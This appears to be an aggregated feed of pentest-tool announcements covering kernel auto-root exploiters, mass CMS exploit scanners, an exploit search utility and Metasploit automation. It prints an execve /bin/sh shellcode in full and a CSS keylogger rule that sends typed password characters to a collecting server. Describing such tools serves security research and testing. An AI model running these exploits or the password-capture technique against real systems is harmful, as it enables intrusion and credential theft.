Auto-Root-Exploit – Auto Root Exploit Tool

Auto Root Exploit ToolAuthor : Nilotpal BiswasFacebook : https://www.facebook.com/nilotpal.biswas.73Twitter : https://twitter.com/nilotpalhackerUSAGE : for kernel version 2.6 all bash autoroot.sh 2 for kernel version 3 all bash autoroot.sh 3 for kernel version 4 all bash autoroot.sh 4 for freebsd & openbsd all bash autoroot.sh bsd for apple macos all bash autoroot.sh app for kernel 2.6,3,4 bsd & app all bash autoroot.sh allScreenshot 1Screenshot 2All exploits are suggested by “exploit-db.com" and will update according to it.Download Auto-Root-Exploit

Link: http://feedproxy.google.com/~r/PentestTools/~3/t-b0Lppu_dw/auto-root-exploit-auto-root-exploit-tool.html

SVScanner – Scanner Vulnerability And Massive Exploit

Is a tool for scanning and massive exploits. Our tools target several open source cms.Getting Started with Linuxgit clone https://github.com/radenvodka/SVScanner.gitcd SVScannerphp svscanner.phpGetting Started with WindowsDownload Xampp (PHP7)Download SVScanner : https://github.com/radenvodka/SVScanner/releasesand open with cmd php svscanner.phpSystems we recommend :PHP 7 (version and up)Install Modules PHP : php-cli & php-curl for linuxCreditsEdo Maland (Powerstager) https://github.com/ScreetsecJack Wilder admin in http://www.linuxsec.orgWant to contributeSend the target live and what exploits are used. then send to maunikah1337@gmail.comDownload SVScanner

Link: http://feedproxy.google.com/~r/PentestTools/~3/Yisgfs6nPoA/svscanner-scanner-vulnerability-and.html

Texas, T-Mobile, and Jack Daniel – Paul’s Security Weekly #573

In the Security News this week, Zero-Day Windows exploits, How to hide sensitive files in encrypted containers, Misfortune Cookie vulnerability returns, and bank robbers faked Cosmos backend to steal 13.5$ million. Full Show Notes Subscribe to YouTube Channel
The post Texas, T-Mobile, and Jack Daniel – Paul’s Security Weekly #573 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/txHBdnnZi2M/

Getsploit v0.2.2 – Command Line Utility For Searching And Downloading Exploits

Command line search and download tool for Vulners Database inspired by searchsploit. It allows you to search online for the exploits across all the most popular collections: Exploit-DB, Metasploit, Packetstorm and others. The most powerful feature is immediate exploit source download right in your working path.Python versionUtility was tested on a python2.6, python2.7, python3.6 with SQLite FTS4 support. If you have found any bugs, don’t hesitate to open issueHow to useInstall: pip install getsploit Search# git clone https://github.com/vulnersCom/getsploit# cd getsploit# ./getsploit.py wordpress 4.7.0Total found exploits: 8Web-search URL: https://vulners.com/search?query=bulletinFamily%3Aexploit%20AND%20wordpress%204.7.0+———————-+——————————–+—————————————————-+| ID | Exploit Title | URL |+======================+================================+====================================================+| PACKETSTORM:141039 | WordPress 4.7.0 / 4.7.1 Insert | https://vulners.com/packetstorm/PACKETSTORM:141039 || | PHP Code Injection | |+———————-+——————————–+—————————————————-+| EDB-ID:41308 | WordPress 4.7.0/4.7.1 Plugin | https://vulners.com/exploitdb/EDB-ID:41308 || | Insert PHP – PHP Code | || | Injection | |+———————-+——————————–+—————————————————-+| EDB-ID:41223 | WordPress 4.7.0/4.7.1 – | https://vulners.com/exploitdb/EDB-ID:41223 || | Unauthenticated Content | || | Injection (PoC) | |+———————-+——————————–+—————————————————-+| PACKETSTORM:140893 | WordPress 4.7.0 / 4.7.1 REST | https://vulners.com/packetstorm/PACKETSTORM:140893 || | API Privilege Escalation | |+———————-+——————————–+—————————————————-+| PACKETSTORM:140902 | WordPress 4.7.0 / 4.7.1 | https://vulners.com/packetstorm/PACKETSTORM:140902 || | Content Injection / Code | || | Execution | |+———————-+——————————–+—————————————————-+| PACKETSTORM:140901 | WordPress 4.7.0 / 4.7.1 | https://vulners.com/packetstorm/PACKETSTORM:140901 || | Content Injection Proof Of | || | Concept | |+———————-+——————————–+—————————————————-+| EDB-ID:41224 | WordPress 4.7.0/4.7.1 – | https://vulners.com/exploitdb/EDB-ID:41224 || | Unauthenticated Content | || | Injection Arbitrary Code | || | Execution | |+———————-+——————————–+—————————————————-+| SSV-92637 | WordPress REST API content | https://vulners.com/seebug/SSV-92637 || | injection | |+———————-+——————————–+—————————————————-+Save exploit files# ./getsploit.py -m wordpress 4.7.0Total found exploits: 8Web-search URL: https://vulners.com/search?query=bulletinFamily%3Aexploit%20AND%20wordpress%204.7.0+———————-+——————————–+—————————————————-+| ID | Exploit Title | URL |+======================+================================+====================================================+| PACKETSTORM:141039 | WordPress 4.7.0 / 4.7.1 Insert | https://vulners.com/packetstorm/PACKETSTORM:141039 || | PHP Code Injection | |+———————-+——————————–+—————————————————-+| EDB-ID:41308 | WordPress 4.7.0/4.7.1 Plugin | https://vulners.com/exploitdb/EDB-ID:41308 || | Insert PHP – PHP Code | || | Injection | |+———————-+——————————–+—————————————————-+| EDB-ID:41223 | WordPress 4.7.0/4.7.1 – | https://vulners.com/exploitdb/EDB-ID:41223 || | Unauthenticated Content | || | Injection (PoC) | |+———————-+——————————–+—————————————————-+| PACKETSTORM:140893 | WordPress 4.7.0 / 4.7.1 REST | https://vulners.com/packetstorm/PACKETSTORM:140893 || | API Privilege Escalation | |+———————-+——————————–+—————————————————-+| PACKETSTORM:140902 | WordPress 4.7.0 / 4.7.1 | https://vulners.com/packetstorm/PACKETSTORM:140902 || | Content Injection / Code | || | Execution | |+———————-+——————————–+—————————————————-+| PACKETSTORM:140901 | WordPress 4.7.0 / 4.7.1 | https://vulners.com/packetstorm/PACKETSTORM:140901 || | Content Injection Proof Of | || | Concept | |+———————-+——————————–+—————————————————-+| EDB-ID:41224 | WordPress 4.7.0/4.7.1 – | https://vulners.com/exploitdb/EDB-ID:41224 || | Unauthenticated Content | || | Injection Arbitrary Code | || | Execution | |+———————-+——————————–+—————————————————-+| SSV-92637 | WordPress REST API content | https://vulners.com/seebug/SSV-92637 || | injection | |+———————-+——————————–+—————————————————-+# lsLICENSE README.md getsploit.py wordpress-470# cd wordpress-470# lsedb-id41223.txt edb-id41224.txt edb-id41308.txt packetstorm140893.txt packetstorm140901.txt packetstorm140902.txt packetstorm141039.txt ssv-92637.txtLocal databaseIf your Python supports sqlite3 lib(builtin) you can use –update and –local commands to download whole exploit database to your PC. After update you can perform local offline searches.# ./getsploit.py –updateDownloading getsploit database archive. Please wait, it may take time. Usually around 5-10 minutes.219642496/219642496 [100.00%]Unpacking database.Database download complete. Now you may search exploits using –local key ‘./getsploit.py -l wordpress 4.7’Download Getsploit

Link: http://feedproxy.google.com/~r/PentestTools/~3/ik5Cki-nwIQ/getsploit-v022-command-line-utility-for.html

BST (Binary String Toolkit) – Quickly And Easily Convert Binary Strings For All Your Exploit Development Needs

The Binary String Toolkit or BST for short is a rather simple utility to convert binary strings to various formats suitable for later inclusions in source codes, such as those used to develop exploits in the security field.FeaturesDump files content to standard output in a binary string format.Convert a plain hexadecimal input to an escaped binary string.Output a sequence of bad characters for testing proof of concept code.Limit the width of binary strings for better readability in source codes.Format output in your favorite programming language’s syntax.Perform binary variable block indentation.DependenciesPOSIX C LibraryC CompilerGCCLLVM ClangGNU MakeGitBuildingTo build and install the ‘bstrings’ binary, simply do:$ git clone https://github.com/e3prom/bst$ cd bst$ make# by default, bstrings is installed in /usr/local/bin.$ make installUsageThe below example show how an assembled shellcode can be quickly dumped (-D) to standard output in a hexadecimal escaped (-x) binary string of 16 hexadecimal digits width (or 8 bytes), with Python syntax formatting and an indentation of 4 space characters:$ bstrings –verbose -x -D lnx-execve-setreuid-x86_64 -w8 -i 4 –syntax=python[*] Convert hexadecimal input to an escaped binary string.[+] Binary string width is limited to 8 bytes.[+] Output binary string using python language syntax.[+] Indentation level set to 4 space character(s). shellcode = “" shellcode += "\x31\xc0\x48\x89\xc7\x48\x89\xc6" shellcode += "\x48\x89\xc2\xb0\x71\x0f\x05\x31" shellcode += "\xc0\x50\x48\xbb\x2f\x62\x69\x6e" shellcode += "\x2f\x2f\x73\x68\x53\x48\x89\xe7" shellcode += "\x50\x48\x89\xe6\x57\x48\x89\xe2" shellcode += "\xb0\x3b\x0f\x05"You can also use bstrings to output an automatically indented bad character sequence, and thus in your favorite programming language:$ bstrings –verbose -b -w12 -i 4 –syntax=c -n badchar[*] Generating bad character binary string.[+] Binary string width is limited to 12 bytes. unsigned char badchar[] = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c" "\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18" "\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24" "\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c" "\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48" "\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54" "\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c" "\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78" "\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84" "\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c" "\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8" "\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4" "\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc" "\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8" "\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4" "\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc" "\xfd\xfe\xff"For a list of supported command-line options, simply execute bstrings with the ‘–help’ switch:$ bstrings –helpUsage: ./bstrings [OPTION]… Convert input to specified binary string format. At least one of the below options must be given: -D, –dump-file=FILE Dump content of file FILE in hexadecimal format -x, –hex-escape Escape input hexadecimal string -b, –gen-badchar Generate a bad character sequence string The below switches are optional: -f, –file=FILE Read input from file FILE instead of stdin -w, –width=BYTES Break binary strings to specified length in bytes -s, –syntax=LANG Output variable using language syntax of LANG -i, –indent=LENGTH Perform indentation for given character length -n, –var-name=VAR Specify binary string variable name (verbose) -h, –help Display this help –interactive Enter interactive mode –verbose Enable verbose output –version Print version information The below languages are supported (case-sensitive): C C Programming language python Python Programming languageDownload BST

Link: http://feedproxy.google.com/~r/PentestTools/~3/FpStPsNMRAw/bst-binary-string-toolkit-quickly-and.html

Metateta – Automated Tool For Scanning And Exploiting Network Protocols Using Metasploit

Metateta Automated Tool For Scanning And Exploiting Network Protocols Using Metasploit For faster pen testing for large networksWhat You Can DoScanning with all metasploit modules for specific network Protocol like smb,smtp,snmpRun all Auxiliary modules against specific network ProtocolRun all Possible Metasploit Exploits for specific network Protocol That’s is not recommended for real pen testingCan Run against one target or network or even text file with targetsUsing example’srun.py -R 192.168.1.15-255 -p smb -x exploit run.py -r 192.168.1.15 -p smtp -x scan run.py -f hosts.txt -p smb -x auxiliaryHossam Mohamed – @wazehellDownload Metateta

Link: http://feedproxy.google.com/~r/PentestTools/~3/JS2U_1rLV1I/metateta-automated-tool-for-scanning.html

CSS Keylogger – Chrome Extension And Express Server That Exploits Keylogging Abilities Of CSS

Chrome extension and Express server that exploits keylogging abilities of CSS.To useSetup Chrome extensionDownload repository git clone https://github.com/maxchehab/CSS-KeyloggingVisit chrome://extensions in your browser (or open up the Chrome menu by clicking the icon to the far right of the Omnibox: The menu’s icon is three horizontal bars. and select Extensions under the More Tools menu to get to the same place).Ensure that the Developer mode checkbox in the top right-hand corner is checked.Click Load unpacked extension… to pop up a file-selection dialog.Select the css-keylogger-extension in the directory which you downloaded this repository.Setup Express serveryarnyarn startHaxking l33t passw0rdsOpen a website that uses a controlled component framework such as React. https://instagram.com.Press the extension C on the top right of any webpage.Type your password.Your password should be captured by the express server.How it worksThis attack is really simple. Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image.For example, the following css will select all input’s with a type that equals password and a value that ends with a. It will then try to load an image from http://localhost:3000/a.input[type=”password"][value$="a"] { background-image: url("http://localhost:3000/a");}Using a simple script one can create a css file that will send a custom request for every ASCII character.Download CSS Keylogger

Link: http://feedproxy.google.com/~r/PentestTools/~3/1jiciHQ1uSs/css-keylogger-chrome-extension-and.html

GyoiThon – A Growing Penetration Test Tool Using Machine Learning

GyoiThon is a growing penetration test tool using Machine Learning.GyoiThon identifies the software installed on web server (OS, Middleware, Framework, CMS, etc…) based on the learning data. After that, it executes valid exploits for the identified software using Metasploit. Finally, it generates reports of scan results. GyoiThon executes the above processing automatically.Processing steps GyoiThon executes the above “Step1" – "Step4" fully automatically.User’s only operation is to input the top URL of the target web server in GyoiThon.It is very easy!You can identify vulnerabilities of the web servers without taking time and effort.Processing flowStep 1. Gather HTTP responses.GyoiThon gathers several HTTP responses of target website while crawling.The following are example of HTTP responses gathered by GyoiThon.Example.1HTTP/1.1 200 OKDate: Tue, 06 Mar 2018 03:01:57 GMTConnection: closeContent-Type: text/html; charset=UTF-8Etag: "409ed-183-53c5f732641c0"Content-Length: 15271…snip…Example.2HTTP/1.1 200 OKDate: Tue, 06 Mar 2018 06:56:17 GMTConnection: closeContent-Type: text/html; charset=UTF-8Set-Cookie: f00e68432b68050dee9abe33c389831e=0eba9cd0f75ca0912b4849777677f587;path=/;Content-Length: 37496…snip…Example.3HTTP/1.1 200 OKDate: Tue, 06 Mar 2018 04:19:19 GMTConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 11819…snip…